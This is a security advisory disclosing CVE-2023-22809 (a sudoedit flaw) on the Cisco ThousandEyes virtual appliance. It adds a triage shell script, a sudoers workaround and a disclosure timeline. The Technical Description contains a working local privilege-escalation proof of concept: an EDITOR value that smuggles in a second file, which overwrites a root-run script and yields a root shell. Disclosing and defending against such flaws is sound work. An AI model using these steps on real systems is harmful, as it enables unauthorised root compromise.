KL-001-2023-003
Cisco ThousandEyes Enterprise Agent Virtual Appliance Arbitrary File Modification via sudoedit

Published: 2023-08-17
Author: Jim Becher of KoreLogic (korelogic.com)
Tags: thousandeyes, virtual appliance, linux, ubuntu, sudo, arbitrary file modification, root-level compromise, CVE-2023-22809

EPSS: 0.001 (Low), percentile 19.3%

  1. Vulnerability Details

    Affected Vendor: ThousandEyes
    Affected Product: ThousandEyes Enterprise Agent Virtual Appliance
    Affected Version: thousandeyes-va-64-18.04 0.218
    Platform: Linux / Ubuntu 18.04
    CWE Classification: CWE-1395: Dependency on Vulnerable Third-Party Component
    CVE ID: CVE-2023-22809

  2. Vulnerability Description

    An unpatched sudoedit vulnerability (CVE-2023-22809), reachable
    because the appliance's sudoers configuration allows the
    'thousandeyes' account to run sudoedit without a password, permits
    that low-privilege user to modify arbitrary files as root and
    subsequently execute arbitrary commands as root.

  3. Technical Description

    The ThousandEyes Virtual Appliance is distributed with a
    restrictive set of commands that the 'thousandeyes' account can
    execute via sudo without providing its password. One of those
    entries permits sudoedit of a single file, /etc/hosts, without a
    password. On the appliance's unpatched sudo build, sudoedit takes
    the editor command from the SUDO_EDITOR, VISUAL and EDITOR
    environment variables and uses '--' to separate that command from
    the list of files to edit; because it does not reject a '--'
    supplied inside those variables, a path placed after '--' in
    EDITOR is added to the list of files to edit and written back as
    root. This is the known sudo vulnerability CVE-2023-22809,
    affecting sudo 1.8.0 through 1.9.12p1 and fixed upstream in
    1.9.12p2 (per https://seclists.org/oss-sec/2023/q1/42), but it had
    not been disclosed as affecting the ThousandEyes Virtual Appliance.
    It can be abused to allow root-level compromise of the virtual
    appliance.

    thousandeyes@thousandeyes-va:~$ id
    uid=1000(thousandeyes) gid=1000(thousandeyes) groups=1000(thousandeyes),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),109(sambashare)
    thousandeyes@thousandeyes-va:~$ sudo -l
    Matching Defaults entries for thousandeyes on thousandeyes-va:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

    User thousandeyes may run the following commands on thousandeyes-va:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: /bin/systemctl start te-va, /bin/systemctl stop te-va, /bin/systemctl restart te-va, /bin/systemctl status te-va, /bin/systemctl start te-agent, /bin/systemctl stop
    te-agent, /bin/systemctl restart te-agent, /bin/systemctl status te-agent, /bin/systemctl start te-browserbot, /bin/systemctl stop te-browserbot, /bin/systemctl restart
    te-browserbot, /bin/systemctl status te-browserbot, /sbin/reboot, sudoedit /etc/hosts, /usr/bin/dig, /usr/bin/lsof, /usr/bin/apt-get update, /usr/bin/apt-get install te-agent,
    /usr/bin/apt-get install te-browserbot, /usr/bin/apt-get install te-va, /usr/bin/apt-get install te-pa, /usr/bin/apt-get install te-va-unlock, /usr/bin/apt-get install
    te-intl-fonts, /usr/bin/apt-get install te-agent-utils, /usr/bin/apt-get install ntpdate, /usr/bin/apt-cache, /usr/bin/te-*, /usr/local/bin/te-*, /usr/local/sbin/te-*
    (root) NOPASSWD: /usr/sbin/ntpdate, /usr/sbin/traceroute, /usr/sbin/tcpdump

    Here we see that /usr/local/bin/te-* are executable as root with no
    password. Even though sudoedit is only permitted on /etc/hosts, we
    can set EDITOR to 'vim -- <path>' so that sudoedit opens <path> as a
    second file (note the "2 files to edit" below) and writes our changes
    back as root. Picking one of the te-* scripts as that path gives us a
    file we can then execute as root via the NOPASSWD rule:

    thousandeyes@thousandeyes-va:~$ file /usr/local/bin/te-set-config
    /usr/local/bin/te-set-config: Python script, ASCII text executable
    thousandeyes@thousandeyes-va:~$ EDITOR='vim -- /usr/local/bin/te-set-config' sudoedit /etc/hosts
    sudoedit: --: editing files in a writable directory is not permitted
    2 files to edit
    sudoedit: /etc/hosts unchanged
    thousandeyes@thousandeyes-va:~$ file /usr/local/bin/te-set-config
    /usr/local/bin/te-set-config: ASCII text
    thousandeyes@thousandeyes-va:~$ cat /usr/local/bin/te-set-config
    /bin/bash
    thousandeyes@thousandeyes-va:~$ sudo /usr/local/bin/te-set-config
    root@thousandeyes-va:~# id
    uid=0(root) gid=0(root) groups=0(root)
    root@thousandeyes-va:~#
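
    The following triage helper is an added example and is not part of the
    KoreLogic advisory or of any Cisco/ThousandEyes tooling. It screens a
    host for the two conditions that combine above: a sudo build in the
    affected range (assumed here, from the upstream sudo advisory, to be
    1.8.0 through 1.9.12p1, with 1.9.12p2 the first fixed release) and a
    sudoers rule that grants sudoedit on some file. The function names
    (sudo_version_key, sudo_version_affected, sudoedit_targets,
    assess_host) and the abbreviated sample `sudo -l` output are mine;
    the sample is constructed from the appliance output shown above.

```shell
#!/bin/sh
# Added triage helper (not from the advisory or from Cisco/ThousandEyes).
# Assumption: sudo 1.8.0 through 1.9.12p1 are affected by CVE-2023-22809
# and 1.9.12p2 is the first fixed upstream release; a host is only exposed
# when such a build also grants sudoedit on at least one file.

# sudo_version_key VERSION -> integer key so that version strings such as
# "1.8.21p2" or "1.9.12p1" compare numerically (major, minor, patch, p-level).
sudo_version_key() {
    v=$1
    case $v in
        *p*) base=${v%%p*}; plevel=${v##*p} ;;
        *)   base=$v;       plevel=0 ;;
    esac
    maj=${base%%.*}
    rest=${base#*.}
    case $rest in
        *.*) min=${rest%%.*}; pat=${rest#*.} ;;
        *)   min=$rest;       pat=0 ;;
    esac
    echo $(( maj * 1000000 + min * 10000 + pat * 100 + plevel ))
}

# sudo_version_affected VERSION -> exit 0 when 1.8.0 <= VERSION <= 1.9.12p1
sudo_version_affected() {
    key=$(sudo_version_key "$1")
    [ "$key" -ge "$(sudo_version_key 1.8.0)" ] &&
        [ "$key" -le "$(sudo_version_key 1.9.12p1)" ]
}

# sudoedit_targets SUDO_L_OUTPUT -> prints each path that a "sudoedit" entry
# in the given `sudo -l` output allows, one per line (empty if none).
sudoedit_targets() {
    printf '%s\n' "$1" |
        tr ',' '\n' |
        sed -n 's/^\(.*[[:space:]]\)\{0,1\}sudoedit[[:space:]]\{1,\}\(.*\)$/\2/p' |
        sed 's/[[:space:]]*$//'
}

# assess_host VERSION SUDO_L_OUTPUT -> EXPOSED when the sudo build is in the
# affected range and at least one sudoedit rule exists, otherwise NOT-EXPOSED.
assess_host() {
    if sudo_version_affected "$1" && [ -n "$(sudoedit_targets "$2")" ]; then
        echo EXPOSED
    else
        echo NOT-EXPOSED
    fi
}

# Constructed sample, abbreviated from the appliance's `sudo -l` output.
SAMPLE_SUDO_L='Matching Defaults entries for thousandeyes on thousandeyes-va:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User thousandeyes may run the following commands on thousandeyes-va:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: /bin/systemctl restart te-va, /sbin/reboot, sudoedit /etc/hosts, /usr/bin/dig, /usr/local/bin/te-*
    (root) NOPASSWD: /usr/sbin/ntpdate, /usr/sbin/tcpdump'

# 1.8.21p2 is the upstream version string of the Ubuntu 18.04 sudo package
# (assumed for the sample); Ubuntu's fix is a backport that keeps that
# string, so the version key is a first-pass filter, not proof of exposure.
printf 'sudoedit targets: %s\n' "$(sudoedit_targets "$SAMPLE_SUDO_L" | tr '\n' ' ')"
printf 'sudo 1.8.21p2 with these rules: %s\n' "$(assess_host 1.8.21p2 "$SAMPLE_SUDO_L")"
printf 'sudo 1.9.13 with these rules:   %s\n' "$(assess_host 1.9.13 "$SAMPLE_SUDO_L")"

# Live host instead of the sample (requires a NOPASSWD or cached sudo session):
#   assess_host "$(sudo -V | sed -n 's/^Sudo version //p')" "$(sudo -n -l 2>/dev/null)"
```

    Treat an EXPOSED verdict as a prompt to confirm, not as a finding: distro
    packages backport the fix without bumping the upstream version string, so
    check the package changelog (or test that sudoedit refuses a '--' in
    EDITOR) before reporting. The sudoedit rule is the part that matters;
    the "(ALL : ALL) ALL" line above is a separate, password-protected grant.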

  4. Mitigation and Remediation Recommendation

    The vendor has released a version which remediates the described
    vulnerability. Release notes are available at:

    https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwf18994
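
    For appliances that cannot be upgraded immediately, the sudoers
    workaround documented in the upstream sudo advisory for
    CVE-2023-22809 is shown below as an added example; it is not the
    configuration Cisco shipped in the fixed release, and the alias name
    TE_SUDOEDIT is my own. The weak rule is the one visible in the
    `sudo -l` output above; the hardened form removes the editor
    environment variables for that rule only, so a '--' in EDITOR never
    reaches sudoedit and the editor comes from the sudoers "editor"
    Default instead.

```sudoers
# Weak: sudoedit takes its editor from the caller's environment, so
# EDITOR='vim -- /path/of/choice' adds a second file to the edit list
thousandeyes ALL=(ALL) NOPASSWD: sudoedit /etc/hosts

# Hardened (workaround for unpatched sudo 1.8.0 - 1.9.12p1): drop
# SUDO_EDITOR, VISUAL and EDITOR for this command only; alias name assumed
Cmnd_Alias TE_SUDOEDIT = sudoedit /etc/hosts
Defaults!TE_SUDOEDIT env_delete += "SUDO_EDITOR VISUAL EDITOR"
thousandeyes ALL=(ALL) NOPASSWD: TE_SUDOEDIT
```

    Apply it with visudo so a syntax error cannot lock out sudo, and keep
    it as a stop-gap: upgrading sudo to a fixed build is the remediation,
    and the workaround does nothing for the separate "(ALL : ALL) ALL"
    grant, which still lets the account run anything once it knows its
    own password.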

  5. Credit

    This vulnerability was discovered by Jim Becher of
    KoreLogic, Inc.

  6. Disclosure Timeline

    2023.04.26 - KoreLogic submits vulnerability details to Cisco.
    2023.04.26 - Cisco acknowledges receipt and the intention to
    investigate.
    2023.05.04 - Cisco notifies KoreLogic that a remediation for this
    vulnerability is expected to be available within
    90 days.
    2023.06.30 - 45 business days have elapsed since KoreLogic reported
    this vulnerability to the vendor.
    2023.07.11 - Cisco informs KoreLogic that the issue has been
    remediated in the latest ThousandEyes Virtual
    Appliance and a Third Party Software Release Note
    Enclosure will be released 2023.08.16. Cisco
    provides CVE-2023-22809 to track this vulnerability.
    2023.07.24 - 60 business days have elapsed since KoreLogic reported
    this vulnerability to the vendor.
    2023.08.16 - Cisco public acknowledgement.
    2023.08.17 - KoreLogic public disclosure.

  7. Proof of Concept

    See 3. Technical Description.